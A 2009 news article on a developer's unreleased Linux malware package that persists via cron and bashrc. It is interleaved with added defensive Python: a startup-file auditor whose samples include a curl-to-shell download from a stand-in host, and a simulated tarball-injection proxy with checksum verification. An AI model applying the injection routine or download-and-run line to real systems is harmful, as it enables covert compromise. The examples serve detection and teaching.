Developer Ponders Release of Linux Malware

  • December 1, 2009
  • By Tom Jowitt

The lack of malware on Linux may be about to change after a developer revealed that he has written a ‘package of malware for Unix/Linux’.

A developer who says he is tired of the “Linux is secure” argument has written a “package of malware for Unix/Linux” to help ethical hackers demonstrate that a loosely configured Linux system can be compromised without exploiting any flaw in the operating system itself.

“I was fed up with the general consensus that Linux is oh-so-secure and has no malware,” a developer going by the name buchner.johannes wrote on Ask Slashdot, in a posting filed by kdawson.

“After a week of work, I finished a package of malware for Unix/Linux,” Johannes wrote. “Its whole purpose is to help white-hat hackers point out that a Linux system can be turned into a botnet client by simply downloading BOINC and attaching it to a user account to help scientific projects.”

Johannes said the malware exploits no security holes: it relies only on loose security configuration and the unthinking execution of unverified downloads.

“I tested it to be injected by a PHP script (even circumventing safe mode), so that the web server runs it; I even got a proxy server that injects it into shell scripts and makefiles in tarballs on the fly, and adds onto Windows executables for execution in Wine. If executed by the user, the malware can persist itself in cron, bashrc and other files,” he said.
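The persistence locations named above (cron, bashrc and similar autostart files) are all writable by the user they belong to, so nothing stops a script the user ran from writing itself there; the practical defence is to audit those files. The following is an added example, not code from the post, that applies a few heuristics to constructed sample contents of a bashrc and a crontab: entries that execute from a hidden directory under the home directory or from a world-writable temp directory, that pipe a download straight into a shell, that background a process at login, or that run at every boot. The patterns and sample lines are assumptions made for the demonstration, and a hit is a prompt to look, not proof of compromise.

```python
import re

# Heuristics for autostart entries that resemble the persistence described in
# the post. They are review prompts, not proof: a legitimate tool can trip
# them too (for example a line sourcing a script from ~/.nvm/).
SUSPICIOUS_PATTERNS = [
    (re.compile(r"(?:^|[\s;&|=])/(?:tmp|var/tmp|dev/shm)/"),
     "executes from a world-writable temp directory"),
    (re.compile(r"(?:\$HOME|~|/home/[^/\s]+|/root)/\.[^/\s]+/\S+"),
     "executes from a hidden directory under the user's home"),
    (re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b"),
     "pipes a download straight into a shell"),
    (re.compile(r"\bnohup\b.*&\s*$"),
     "backgrounds a long-running process at login"),
    (re.compile(r"^@reboot\b"),
     "cron entry runs at every boot"),
]

# Constructed sample inputs for this example (not taken from a real system).
SAMPLE_BASHRC = """# ~/.bashrc (constructed sample for this example)
export PATH="$HOME/bin:$PATH"
alias ll='ls -alF'
nohup $HOME/.cache/.sys/update >/dev/null 2>&1 &
curl -s http://example.invalid/x.sh | sh
"""

SAMPLE_CRONTAB = """# m h dom mon dow command (constructed sample for this example)
0 3 * * * /usr/bin/apt-get update -q
*/5 * * * * /tmp/.X11-unix/.k/node >/dev/null 2>&1
@reboot /home/alice/.local/share/.cache/run.sh
"""


def audit_startup_file(name: str, text: str) -> list:
    """Return one finding per suspicious line.

    Each finding is a dict with keys 'file', 'lineno', 'line' and 'reasons';
    blank lines and comment lines are skipped.
    """
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = [why for pattern, why in SUSPICIOUS_PATTERNS if pattern.search(line)]
        if reasons:
            findings.append({"file": name, "lineno": lineno, "line": line, "reasons": reasons})
    return findings


def audit_all() -> list:
    """Audit both constructed samples; on a real host you would read the
    user's shell startup files and the output of `crontab -l` instead."""
    return (audit_startup_file("~/.bashrc", SAMPLE_BASHRC)
            + audit_startup_file("crontab", SAMPLE_CRONTAB))


if __name__ == "__main__":
    for finding in audit_all():
        print(f"{finding['file']}:{finding['lineno']}: {finding['line']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

On a real system the same function would be pointed at ~/.bashrc, ~/.profile, ~/.bash_profile, the user's crontab, and the system-wide /etc/cron.d and /etc/profile.d entries; comparing those files against a known-good copy or a package manager's checksums is a stronger check than any pattern list.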

Johannes said the object of the exercise was to provide a harmless payload that security people can use to ‘pwn’ systems and demonstrate their weaknesses, without doing damage such as deleting files or disrupting normal operation.

However, he admitted to doubts over how ethical it would be to release the toolkit.

He is concerned that a real attacker could rip out the BOINC payload and put “in something really evil”, at which point it “could be turned into proper Linux malware.”

“On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed. On the other hand, such a script can be written by anyone else too, and it would be useful to show people why you need SELinux on a server, and why verifying the source of downloads (checksums through trusted channels) is necessary,” he said.
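The advice to verify downloads through a trusted channel is exactly what defeats the on-the-fly tarball injection described earlier in the post. The following added example, which is not the author's code, models both halves: a constructed in-memory release tarball, a hypothetical proxy that appends a line to every shell script and Makefile in transit, and a downloader that checks the archive's SHA-256 against a digest it obtained out of band. It also shows why a digest fetched through the same untrusted path proves nothing. File names, contents and the injected line are all invented for the demonstration.

```python
import hashlib
import hmac
import io
import tarfile

# Constructed sample release for this example: a tiny source tree that would
# normally be fetched as a tarball. Names and contents are invented.
PRISTINE_FILES = {
    "pkg-1.0/configure": "#!/bin/sh\necho checking build environment\n",
    "pkg-1.0/Makefile": "all:\n\t$(CC) -o pkg main.c\n",
    "pkg-1.0/main.c": "int main(void) { return 0; }\n",
}

# The line a hostile proxy might append; constructed for the demonstration.
INJECTED_LINE = 'nohup "$HOME/.cache/.sys/update" >/dev/null 2>&1 &'


def build_tarball(files: dict) -> bytes:
    """Pack files into an uncompressed in-memory tar with fixed metadata."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            info.mtime = 0  # fixed so the archive is reproducible
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_download(downloaded: bytes, trusted_digest: str) -> bool:
    """Compare what actually arrived against a digest obtained through a
    channel the proxy cannot rewrite (a signed announcement, distribution
    package metadata, or a signature checked against a known key)."""
    return hmac.compare_digest(sha256_hex(downloaded), trusted_digest.lower())


def inject_into_scripts(tar_bytes: bytes, payload_line: str) -> bytes:
    """Hypothetical model of the on-the-fly proxy the post describes (not the
    author's code): rewrite the tarball in transit, appending a line to every
    shell script and Makefile and leaving the other members untouched."""
    out = io.BytesIO()
    src = tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r")
    with src, tarfile.open(fileobj=out, mode="w") as dst:
        for member in src.getmembers():
            if not member.isfile():
                dst.addfile(member)
                continue
            data = src.extractfile(member).read()
            base = member.name.rsplit("/", 1)[-1]
            if base in ("configure", "Makefile") or base.endswith(".sh"):
                data += payload_line.encode() + b"\n"
                member.size = len(data)
            dst.addfile(member, io.BytesIO(data))
    return out.getvalue()


def read_member(tar_bytes: bytes, name: str) -> str:
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        return tar.extractfile(name).read().decode()


def demo() -> dict:
    pristine = build_tarball(PRISTINE_FILES)
    # The publisher computes this on the pristine archive and the downloader
    # obtains it out of band; it is the one thing the proxy cannot forge.
    trusted_digest = sha256_hex(pristine)
    tampered = inject_into_scripts(pristine, INJECTED_LINE)
    return {
        "pristine_ok": verify_download(pristine, trusted_digest),
        "tampered_ok": verify_download(tampered, trusted_digest),
        # A digest fetched through the same proxy proves nothing: the proxy
        # simply serves the digest of what it injected.
        "digest_via_proxy_ok": verify_download(tampered, sha256_hex(tampered)),
        "injected_configure": read_member(tampered, "pkg-1.0/configure"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The point of the third result is the "trusted channels" qualifier in the quote: a SHA256SUMS file served next to the tarball over the same HTTP path is rewritten as easily as the tarball. A digest only helps when it comes from somewhere the attacker cannot touch, such as a detached signature verified against a key obtained beforehand, or the checksums carried in a distribution's signed package metadata.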

“Technically, it is a nice piece, but should I release it? I don’t want to turn the Linux desktop into Windows, hence I’m slightly leaning towards not releasing it. What does your ethics say about releasing such grayware?” he asked.

Opinions on Johannes’s dilemma were mixed. One user, Jeff321, said he believed Johannes had already decided.

“There were two options,” Jeff321 wrote. “1. Release it anonymously and take no credit. 2. Write about it and get some credit (but then you can’t actually release it due to legal issues).”

“You can’t (and won’t) release it now,” he added. “If somebody gets attacked with your code, guess who they’re going to prosecute and/or sue.”

Another user, sopssa, also waded in. “The summary says it doesn’t actually do anything malicious and it isn’t a worm. There is no legal reason why he couldn’t release the code and/or a paper about it,” said sopssa.

“The thing is, it’s stupid for people to keep thinking their systems are insanely secure,” he wrote. “Linux users fall for this all the time because they’ve heard so from lots of other Linux users. It’s better to show people that it is actually possible, and maybe it leads to better-secured systems too.”